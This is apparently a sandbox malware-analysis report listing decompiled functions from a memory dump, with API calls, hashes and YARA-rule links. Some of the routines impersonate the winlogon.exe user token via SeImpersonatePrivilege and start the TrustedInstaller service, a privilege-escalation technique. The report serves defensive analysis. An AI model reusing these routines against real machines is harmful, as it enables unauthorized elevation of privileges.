                                                                                                                                                                                                                          0x00401f77
                                                                                                                                                                                                                          0x00401f78
                                                                                                                                                                                                                          0x00401f91
                                                                                                                                                                                                                          0x00401f7a
                                                                                                                                                                                                                          0x00401f88
                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                          0x00401fa9
                                                                                                                                                                                                                          0x00401fae
                                                                                                                                                                                                                          0x00401fb0
                                                                                                                                                                                                                          0x00401fb2
                                                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                                                          0x00401fc2
                                                                                                                                                                                                                          0x00401fca
                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                          0x00401fd7
                                                                                                                                                                                                                          0x00401fd7
                                                                                                                                                                                                                          0x00401fe3

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F27
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F3F
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F5A
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F69
                                                                                                                                                                                                                          • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                                                                                                                          • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3867304300-2177360481
                                                                                                                                                                                                                          • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                                                                                                                          0x00401319
                                                                                                                                                                                                                          0x0040131b
                                                                                                                                                                                                                          0x00401327
                                                                                                                                                                                                                          0x0040132b
                                                                                                                                                                                                                          0x0040133a
                                                                                                                                                                                                                          0x0040134b
                                                                                                                                                                                                                          0x0040134b
                                                                                                                                                                                                                          0x0040134e
                                                                                                                                                                                                                          0x0040134e
                                                                                                                                                                                                                          0x00401353
                                                                                                                                                                                                                          0x0040135b

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                                                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                                                                                                                          • String ID: TrustedInstaller
                                                                                                                                                                                                                          • API String ID: 862991418-565535830
                                                                                                                                                                                                                          • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                                                                                                                          0x0040955f
                                                                                                                                                                                                                          0x00409566
                                                                                                                                                                                                                          0x0040956e
                                                                                                                                                                                                                          0x00409576
                                                                                                                                                                                                                          0x00409586
                                                                                                                                                                                                                          0x00409586
                                                                                                                                                                                                                          0x0040956e
                                                                                                                                                                                                                          0x00409592
                                                                                                                                                                                                                          0x004095aa
                                                                                                                                                                                                                          0x00409594
                                                                                                                                                                                                                          0x004095a3
                                                                                                                                                                                                                          0x004095a6
                                                                                                                                                                                                                          0x004095a6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                          • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                                                                                                                          0x0040a348
                                                                                                                                                                                                                          0x0040a34e
                                                                                                                                                                                                                          0x0040a352
                                                                                                                                                                                                                          0x0040a35f
                                                                                                                                                                                                                          0x0040a363
                                                                                                                                                                                                                          0x0040a369
                                                                                                                                                                                                                          0x0040a371
                                                                                                                                                                                                                          0x0040a374
                                                                                                                                                                                                                          0x0040a37c
                                                                                                                                                                                                                          0x0040a380
                                                                                                                                                                                                                          0x0040a383
                                                                                                                                                                                                                          0x0040a386
                                                                                                                                                                                                                          0x0040a388
                                                                                                                                                                                                                          0x0040a388
                                                                                                                                                                                                                          0x0040a38c
                                                                                                                                                                                                                          0x0040a38f
                                                                                                                                                                                                                          0x0040a39f
                                                                                                                                                                                                                          0x0040a3a1
                                                                                                                                                                                                                          0x0040a3a5
                                                                                                                                                                                                                          0x0040a3a5
                                                                                                                                                                                                                          0x0040a3a9
                                                                                                                                                                                                                          0x0040a3aa
                                                                                                                                                                                                                          0x0040a3b3
                                                                                                                                                                                                                          0x0040a3b3
                                                                                                                                                                                                                          0x0040a37c
                                                                                                                                                                                                                          0x0040a371
                                                                                                                                                                                                                          0x0040a3b8
                                                                                                                                                                                                                          0x0040a3be

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                          • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                                                                          • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                                                                                          0x00404951
                                                                                                                                                                                                                          0x00404952
                                                                                                                                                                                                                          0x00404956
                                                                                                                                                                                                                          0x004049a1
                                                                                                                                                                                                                          0x00404958
                                                                                                                                                                                                                          0x00404959
                                                                                                                                                                                                                          0x0040495b
                                                                                                                                                                                                                          0x0040495b
                                                                                                                                                                                                                          0x0040495f
                                                                                                                                                                                                                          0x00404961
                                                                                                                                                                                                                          0x00404963
                                                                                                                                                                                                                          0x0040496d
                                                                                                                                                                                                                          0x00404975
                                                                                                                                                                                                                          0x00404977
                                                                                                                                                                                                                          0x0040497b
                                                                                                                                                                                                                          0x00404985
                                                                                                                                                                                                                          0x0040498a
                                                                                                                                                                                                                          0x0040498e
                                                                                                                                                                                                                          0x00404993
                                                                                                                                                                                                                          0x0040499d
                                                                                                                                                                                                                          0x0040499d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                          • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                                          • String ID: W@
                                                                                                                                                                                                                          • API String ID: 3056473165-1729568415
                                                                                                                                                                                                                          • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                                                                                                                          0x0040543f
                                                                                                                                                                                                                          0x00405456
                                                                                                                                                                                                                          0x00405462
                                                                                                                                                                                                                          0x00405467
                                                                                                                                                                                                                          0x0040546d
                                                                                                                                                                                                                          0x00405478
                                                                                                                                                                                                                          0x00405489
                                                                                                                                                                                                                          0x0040548d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405492
                                                                                                                                                                                                                          0x00405496

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3725422290-0
                                                                                                                                                                                                                          • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                                                                                                                          • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}





























                                                                                                                                                                                                                          0x004056b5
                                                                                                                                                                                                                          0x004056c3
                                                                                                                                                                                                                          0x004056c5
                                                                                                                                                                                                                          0x004056cc
                                                                                                                                                                                                                          0x004056cf
                                                                                                                                                                                                                          0x004056d2
                                                                                                                                                                                                                          0x004056d5
                                                                                                                                                                                                                          0x004056dc
                                                                                                                                                                                                                          0x004056df
                                                                                                                                                                                                                          0x004056e2
                                                                                                                                                                                                                          0x004056e5
                                                                                                                                                                                                                          0x004056e8
                                                                                                                                                                                                                          0x004056ef
                                                                                                                                                                                                                          0x004056f2
                                                                                                                                                                                                                          0x004056f7
                                                                                                                                                                                                                          0x004056fd
                                                                                                                                                                                                                          0x00405832
                                                                                                                                                                                                                          0x00405832
                                                                                                                                                                                                                          0x00405835
                                                                                                                                                                                                                          0x00405835
                                                                                                                                                                                                                          0x00405838
                                                                                                                                                                                                                          0x0040583e
                                                                                                                                                                                                                          0x00405849
                                                                                                                                                                                                                          0x00405849
                                                                                                                                                                                                                          0x00405703
                                                                                                                                                                                                                          0x00405706
                                                                                                                                                                                                                          0x00405709
                                                                                                                                                                                                                          0x00405710
                                                                                                                                                                                                                          0x0040575b
                                                                                                                                                                                                                          0x00405766
                                                                                                                                                                                                                          0x0040577b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040577d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040577d
                                                                                                                                                                                                                          0x0040576b
                                                                                                                                                                                                                          0x0040576e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405783
                                                                                                                                                                                                                          0x00405783
                                                                                                                                                                                                                          0x00405785
                                                                                                                                                                                                                          0x004057d1
                                                                                                                                                                                                                          0x004057dc
                                                                                                                                                                                                                          0x004057e4
                                                                                                                                                                                                                          0x004057e8
                                                                                                                                                                                                                          0x004057eb
                                                                                                                                                                                                                          0x004057ec
                                                                                                                                                                                                                          0x004057ef
                                                                                                                                                                                                                          0x004057ef
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004057ef
                                                                                                                                                                                                                          0x0040578b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405790
                                                                                                                                                                                                                          0x00405796
                                                                                                                                                                                                                          0x00405798
                                                                                                                                                                                                                          0x0040579e
                                                                                                                                                                                                                          0x004057a1
                                                                                                                                                                                                                          0x004057b4
                                                                                                                                                                                                                          0x004057a3
                                                                                                                                                                                                                          0x004057a5
                                                                                                                                                                                                                          0x004057a5
                                                                                                                                                                                                                          0x004057ba
                                                                                                                                                                                                                          0x004057c1
                                                                                                                                                                                                                          0x004057c3
                                                                                                                                                                                                                          0x004057c3
                                                                                                                                                                                                                          0x004057c8
                                                                                                                                                                                                                          0x004057cb
                                                                                                                                                                                                                          0x004057cb
                                                                                                                                                                                                                          0x004057ce
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004057ce
                                                                                                                                                                                                                          0x00405717
                                                                                                                                                                                                                          0x0040571a
                                                                                                                                                                                                                          0x00405725
                                                                                                                                                                                                                          0x0040572a
                                                                                                                                                                                                                          0x0040572f
                                                                                                                                                                                                                          0x00405733
                                                                                                                                                                                                                          0x00405735
                                                                                                                                                                                                                          0x00405735
                                                                                                                                                                                                                          0x0040573e
                                                                                                                                                                                                                          0x00405743
                                                                                                                                                                                                                          0x00405746
                                                                                                                                                                                                                          0x0040574d
                                                                                                                                                                                                                          0x00405750
                                                                                                                                                                                                                          0x00405750
                                                                                                                                                                                                                          0x0040571a
                                                                                                                                                                                                                          0x004057f2
                                                                                                                                                                                                                          0x004057f2
                                                                                                                                                                                                                          0x004057f8
                                                                                                                                                                                                                          0x004057fe
                                                                                                                                                                                                                          0x004057fe
                                                                                                                                                                                                                          0x00405809
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405810
                                                                                                                                                                                                                          0x00405815
                                                                                                                                                                                                                          0x0040581a
                                                                                                                                                                                                                          0x0040581e
                                                                                                                                                                                                                          0x00405820
                                                                                                                                                                                                                          0x00405820
                                                                                                                                                                                                                          0x00405825
                                                                                                                                                                                                                          0x0040582b
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                                                                                                                            • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
